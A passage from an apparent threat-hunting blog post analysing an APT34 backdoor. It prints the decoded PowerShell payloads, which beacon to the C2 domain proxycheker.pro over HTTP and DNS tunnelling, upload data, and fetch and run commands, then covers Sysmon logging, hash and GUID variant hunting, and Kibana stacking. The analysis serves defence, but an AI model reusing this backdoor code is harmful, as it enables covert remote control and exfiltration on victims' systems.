AJAB0AHIAdQBlADsAJABhAGMAIAA9ACAAIgAxACIAOwAkAGMAdAAgAD0AIAAwADsAfQANAAoAaQBmACAAKAAoACQAcgBzAFsAMABdACAALQBlAHEAIAAxADEAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMQBdACAALQBlAHEAIAAyADQAKQAgAC0AYQBuAGQAIAAoACQAcgBzAFsAMgBdACAALQBlAHEAIAAyADMANwApACAALQBhAG4AZAAgACgAJAByAHMAWwAzAF0AIAAtAGUAcQAgADEAMQAwACkAKQAgAHsAJAByAHUAbgA9ACQAZgBhAGwAcwBlADsAYgByAGUAYQBrADsAfQB9AA0ACgANAAoAaQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAcwBwACkALgBsAGUAbgBnAHQAaAAgAC0AZwB0ACAAMABrAGIAKQB7AA0ACgAJAGkAZgAgACgAJABzAHAALgBFAG4AZABzAFcAaQB0AGgAKAAiADAAIgApACkADQAKAAkAewANAAoACQAJACQAZgBjACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQAcwBwACAAfAAgAD8AIAB7ACAAJABfAC4AdAByAGkAbQAoACkAIAAtAG4AZQAgACIAIgAgAH0AOwANAAoACQAJACQAcgBlACAAKwA9ACAAJABmAGMALgBTAHAAbABpAHQAKAAiACYAIgApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAAgAHsAIAAkAF8AIAB8ACAAaQBlAHgAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgAH0ADQAKAAkAfQANAAoACQBlAGwAcwBlAGkAZgAgACgAJABzAHAALgBFAG4AZABzAFcAaQB0AGgAKAAiADEAIgApACkADQAKAAkAewANAAoACQAJAE0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABzAHAAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACgAJABzAHAAKwAiAC4AcABzADEAIgApACAALQBGAG8AcgBjAGUAOwANAAoACQB9AA0ACgAJAGUAbABzAGUAaQBmACAAKAAkAHMAcAAuAEUAbgBkAHMAVwBpAHQAaAAoACIAMgAiACkAKQANAAoACQB7AA0ACgAJAAkATQBvAHYAZQAtAEkAdABlAG0AIAAtAHAAYQB0AGgAIAAkAHMAcAAgAC0AZABlAHMAdABpAG4AYQB0AGkAbwBuACAAKAAkAHMAcAArACIALgB2AGIAcwAiACkAIAAtAEYAbwByAGMAZQA7AA0ACgAJAH0ADQAKAH0ADQAKAH0ADQAKAA==", 0, false

Essentially, every time that VBScript runs through the schedule task job (mentioned in the previous section), it will attempt to execute a PowerShell with the -EncodedCommand flag and the run each one of these base64 encoded strings. These bases64 encoded strings can be decoded easily to the following code:

powershell.exe -exec bypass -enc JABzAHIA....
-------------
$srvr = "http:\\" + [System.Net.Dns]::GetHostAddresses("www.proxycheker.pro") +"/update_wapp.aspx";
$k=getmac | Out-String | %{ $_ -match '(?:[0-9a-f]{2}[:-]){5}[0-9a-f]{2}' };
if($k){${global:$aid} = $matches[0] -replace "-", "";} else {${global:$aid} = whoami | %{[byte[]][char[]]$_ -join ''} | %{$_.substring(0,11)} | %{$_ + "120120011224"} | %{$_.substring(0,11)}}
${global:$rPath} = $env:ProgramData + "\Windows\Microsoft\Java\" + ${global:$aid};
function sndr
{
param($fname, $cnt)
$adr = adrCt "$fname" "2"
${global:$wc}.UploadString($adr, [System.Convert]::ToBase64String([System.Text.Encoding]::Default.GetBytes($cnt)));
}
function adrCt
{
param ($ridIn, $ac)
$cr = @();
$dar = @();
$dar = -join (Get-Random -InputObject (0 .. 9) -Count 15);
$cr = Get-Random -InputObject (0 .. 9) -Count 2;
$dar = $dar.Insert($cr[0], $ridIn.Trim()).Insert(($cr[1]), ${global:$aid});
$adr = "$($srvr)?version=$($dar)5$($ac)7$($cr[0])$($cr[1])";
return $adr;
}
function ldCfg
{
$cfgAdr = $env:TMP + "\cfg.ini";
if (Test-Path -Path ($cfgAdr))
{
$lines = Get-Content ($cfgAdr) | Where { $_ -notmatch '^\s+$' }
foreach ($line in $lines)
{
$a = $line -split ','
switch ($a[0])
{
"usr"{ $PUser = $a[1] + ""; }
"pas"{ $PPass = $a[1] + ""; }
"use"{ $PUse = $a[1] + ""; }
"srv"{ $PServer = $a[1] + ""; }
"prt"{ $PPort = $a[1] + ""; }
"dom"{ $PDom = $a[1] + ""; }
}
}
}
if ($PServer -and $PUse -eq "t")
{
$uri = "http://" + $PServer + ":" + $PPort;
$proxy = new-object System.Net.WebProxy($uri, $true);
$proxy.credentials = new-object System.Net.NetworkCredential($PUser, $PPass, $PDom)
${global:$wc} = new-object system.net.WebClient;
${global:$wc}.proxy = $proxy;
}
else
{
${global:$wc} = new-object system.net.WebClient;
}
}
ldCfg;
if (-not (Test-Path -Path ${global:$rPath})) { New-Item -ItemType Directory -Path ${global:$rPath}; }
$adr = adrCt "24351243510" "0"
$rid = (${global:$wc}.DownloadString($adr) + " ").Trim();
if ($rid)
{
if ($rid.length -eq 11)
{
$adr = adrCt "$rid" "1"
$r = ${global:$wc}.DownloadString($adr);
$rcnt = [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String($r));
$adr = adrCt "$rid" "3"
${global:$wc}.DownloadString($adr);
if ($rid.EndsWith("0"))
{
$rcnt = $rcnt |

Well, I won’t go through each line in the code to explain what that encoded PowerShell does. However, you can clearly see in the first line that the script attempts to communicate with a remote URL www.proxycheker.pro/update_wapp.aspx. According to FireEye, this domain is a Command-And-Control (C2). Side note: this domain appears to be offline during the time of writing this blog post. If you are also indexing extended Powershell logs to Elasticsearch, then you should be able to see a decoded version of this string under event ID 4104 as shown below:

event_id_4104

The second encoded base64 string can be decoded easily to the following code:

powershell.exe -exec bypass -enc aQBmAC...
----------
if ((Get-WmiObject Win32_Process -Filter ("Name='powershell.exe' AND CommandLine LIKE '%"+$MyInvocation.MyCommand.Name.Trim()+"%'")).length -lt 2) {
$aid=whoami | %{[byte[]][char[]]$_ -join ''} | %{$_.substring(0,12)} | %{$_ + "120120011224"} | %{$_.substring(0,12)};$sp = $env:TEMP;
$sm = $false;$ct = 0;$fb = @();$rn = "000";$ac = "0";$run = $true;$ec=0;
While ($run){Start-Sleep -m 200;
if($ec -ge 5){exit}
if ($ct -lt 10) { $rn = "00$($ct)"; }elseif ($ct -lt 100) { $rn = "0$($ct)"; }else { $rn = "$($ct)"; }
$rand = -join (Get-Random -InputObject (10 .. 99) -Count (%{ Get-Random -InputObject (1 .. 6) }));
try{$lastAddress= "$($rand)$($ac)$($rn)7$($aid).proxycheker.pro";
$rt = [System.Net.Dns]::GetHostAddresses($lastAddress);}catch{$ec++;continue;}
$result = $rt[0].IPAddressToString;$rs = $result.Split('.');
if (($rs[0] -eq 1) -and ($rs[1] -eq 2) -and ($rs[2] -eq 3)){$sm = $false;$ac = "0";
$le = $fb.Length;if ($fb[$len-1] -eq 0 -and $fb[$len-2] -eq 0)
{$fbt = $fb[0 .. ($le - 3)];}elseif ($fb[$le - 1] -eq 0){$fbt = $fb[0 .. ($le - 2)];}else{$fbt = $fb;}
[System.IO.File]::WriteAllBytes($sp, $fbt);$fb = @();$ct = 0;break;}
if ($sm){if ($ct -gt 250) {$ct = 0;}
if ($ct -eq $rs[3]){$fb += $rs[0];$fb += $rs[1];$fb += $rs[2];$ct = $ct + 3;}}
if (($rs[0] -eq 24) -and ($rs[1] -eq 125)){$sp += "\" + $rs[2] + "" + $rs[3];$sm = $true;$ac = "1";$ct = 0;}
if (($rs[0] -eq 11) -and ($rs[1] -eq 24) -and ($rs[2] -eq 237) -and ($rs[3] -eq 110)) {$run=$false;break;}}
if ((Get-Item $sp).length -gt 0kb){
if ($sp.EndsWith("0"))
{
$fc = Get-Content $sp | ? { $_.trim() -ne "" };
$re += $fc.Split("&") | foreach-object { $_ | iex | Out-String }
}
elseif ($sp.EndsWith("1"))
{
Move-Item -path $sp -destination ($sp+".ps1") -Force;
}
elseif ($sp.EndsWith("2"))
{
Move-Item -path $sp -destination ($sp+".vbs") -Force;
}
}
}

And, this is how you would see it under event ID 4104:

event_id_4104_2

Finally, from a parent-child process perspective, that process execution should look like the following figure:

hybrid-analysis

This figure was taken from Hybrid-Analysis (the link is provided in the reference section below) from a similar variant like the one discussed in this blog post. Alright, we are now moving on to the final section. I did some threat intel research and came across similar variants. I thought it was worth to mention them here since we already discussed APT34 tools.

Additional Variants

On June 25, 2015, Brian Wallace published the article Using .NET GUIDs to help hunt for malware. In a nutshell, every time a .NET source-code it complied to a binary file, it will contain two unique GUIDs (you can see an example of these values under the .NET details in the figure of the file dupdatechecker.exe above). According to the article, “One GUID is created by Visual Studio on the creation of new projects and stored as a string, the other is generated on every build and stored as a binary value. These GUIDs can be used to determine whether multiple samples are from the same Visual Studio project, effectively identifying the family, and to identify samples that are the result of the same build, allowing for the identification of post-compilation modifications made by tools such as builders.“. Online resources such as Virustotal, allow us to search for .NET binary files based on their GUIDs value. You can search the netGUID value 84e31856-683b-41c0-81dd-a02d8b795026 taken from the binary file dupdatechecker.exe in Virustotal. The results suggest that there are at least for more variants from the same malware family in the wild. Here is the SHA1 value of these four binary files:

d47d5c372ae265698b5f01bc20a6c1b8fa8280d1
8777e01b93e5d025d51b6242279b9468acf3f311
c1e1939fadc64422b1e1018920a4c77f3f1a5d15
37aff6875b79db3d77b8c91eecad20d0c831e073

The binary files associated with these SHA1 hash values also contain similar code structure when decompiled with the ILSPy application. In addition, once executed, these binary files also perform similar activity and create similar files on the system. My assumption here that they are variants of the same threat.

Stacking Through Visualization

One of the coolest things that you can do via Kibana is to visualize all sorts of fields common to your indexed documents. In Visualization you can take for example common strings in one field and stack them together through creating a table or a piechart. Stacking allows you to perform frequency analysis of the most popular exact items, to the least ones and so on. Stacking allows you to find events that repeat themselves less frequently. As such, it allows you to find a “needle in a haystack”. Take for example the following figure:

Parent Command Line 2

You can create a table and then filter on the field term [event_data][ParentCommandLine]. This will allow you stack the most common strings in this field. The order is descending from the most popular exact same string in this field to the very least. What you could do here is also switch the order ascending mode (although not supported with the latest version of Elasticsearch and Kibana) and then get the least most popular strings in this field as show in the image below:

Parent Command Line Ascending

Here is another example:

Stacking Command Line Desc

Similar to the previous table, you can also create a table and then filter on the field term [event_data][CommandLine]. This will allow you stack the most common strings in this field. The order is descending from the most popular exact same string in this field to the very least. What you could do here is also switch the order ascending mode and then get the least most popular strings in this field as show in the image below:

Stacking Command Line - Asc

Side Note: These two fields ParentCommandLine and CommandLine can be found in Sysmon events ID #1.


I hope you have enjoyed reading this post. Please leave me a comment if you have any feedback, suggestions or things you would like me to write about in upcoming blog posts.

THE END!

References & Credits

GetNETGUIDs Python Lib
https://github.com/CylanceSPEAR/GetNETGUIDs

Hybrid-Analysis
https://www.hybrid-analysis.com/sample/de620a0511d14a2fbc9b225ebfda550973d956ab4dec7e460a42e9d2d3cf0588?environmentId=100

 ILSpy
http://ilspy.net/

New Targeted Attack in the Middle East by APT34, a Suspected Iranian Threat Group, Using CVE-2017-11882 Exploit
https://www.fireeye.com/blog/threat-research/2017/12/targeted-attack-in-middle-east-by-apt34.html

Sysinternals Sysmon suspicious activity guide

Sysinternals Sysmon suspicious activity guide

Sysinternals Sysmon unleashed

Sysinternals Sysmon unleashed

ThreatHunter-Playbook (Sysmon Configuration Files)
https://github.com/Cyb3rWard0g/ThreatHunter-Playbook/tree/master/attack_matrix/windows/sysmon_configs

Using .NET GUIDs to help hunt for malware
https://www.virusbulletin.com/virusbulletin/2015/06/using-net-guids-help-hunt-malware

One Comment

  1. virtual time clock online

    Excellent, what a weblog it is! This web site provides
    helpful information to us, keep it up.

Leave a Reply to virtual time clock online Cancel

Your email address will not be published. Required fields are marked *